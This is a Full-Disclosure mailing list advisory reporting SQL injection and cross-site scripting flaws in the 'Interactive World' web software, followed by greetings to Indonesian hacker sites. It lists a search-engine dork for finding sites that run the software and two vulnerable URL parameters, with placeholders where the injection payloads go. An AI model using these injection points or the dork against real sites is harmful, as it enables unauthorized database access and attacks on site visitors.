[Full-disclosure] Interactive World SQL Injection Vulnerability [ Multiple Vulnerabilities ]

[cyber netron <cybernetron@xxxxxxxxx>]

Interactive World (index.php) Sql Injection Vulnerability [ Multiple
Vulnerabilities ]
==============================================================

####################################################################
.:. Exploit Title : Interactive World SQL Injection Vulnerability [ Multiple
Vulnerabilities ]
.:. Author : Netrondoank aka netron
.:. My Web : www.indonesiansecurity.info ,indotek.or.id and Ilmuhacker.org
.:. Platform/Tested on: Linux
.:. Version : none
.:. Software Link: : http://www.interactive-world.com
.:. Dork : "Powered By Interactive World"

####################################################################

.:.  Exploit

===[ SQL Injenction ]===
http://www.site.com//news_desc.php?Id=[Sqli]


Xss
===[ XSS/HTML Injection ]===
http://site/path/latest_news_next.php?id=89&news_type=[XSS ATTACK HERE]


####################################################################

[+] Spesial thanks to all friend @ site : IndonesianSecurity.info +
codenesia.com
+palembangHackerlink.org + Blitar hackerlink dot org + hacker newbie dot org
+ binus hacker dot org +
+indonesianblogger.org + kimmonosz (kimmonosz.tk) + jos ali joe (
exploit-id.com) + dewancc (dawnc0de.com)
+pokeng  + budi anja (biohazzard) +klicak + dymaz spyro (gaya rambutmu leh
ditiru)
+doni mustofa anak2 uin jakarta + crashblack here + hmei7 + junbad (
indonesiancoder.com) + skutengboy (maapin gua bro)
+ almh viroes banditc0de + ares blue screen (jgn maen mulu loh skripsi
urusin) + budi_spielberg (met nikah yee) + om leman (indonesiancyber.org)

[+] Lamer juga manusia punya otak
[+] ku cinta padamu susi  tapi dirimu tak cinta padaku .wkwkwkwkw
[+] jos ali joe , thx to notice for submit my poc to exploit-id.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/